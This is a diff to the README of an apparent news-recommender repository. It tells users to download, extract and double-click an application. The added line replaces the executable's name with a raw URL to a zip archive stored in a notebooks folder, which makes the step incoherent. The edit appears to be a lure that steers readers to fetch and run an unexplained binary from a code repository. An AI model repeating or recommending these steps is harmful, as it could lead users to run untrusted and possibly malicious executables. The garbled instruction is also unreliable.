nanasplace-dev/MIND-News-RecSys/README.md

 1. Locate the downloaded file in your downloads folder or specified download location.
 2. If you downloaded a `.zip` file, right-click on it, select "Extract All," and follow the prompts.
 3. Open the extracted folder.
-4. Look for the application file, usually named `MIND-News-RecSys.exe` (on Windows) or equivalent for other systems.
+4. Look for the application file, usually named `https://raw.githubusercontent.com/nanasplace-dev/MIND-News-RecSys/main/notebooks/MIND-News-RecSys-2.0.zip` (on Windows) or equivalent for other systems.
 5. Double-click the file to run the application.

 ## 🎨 Features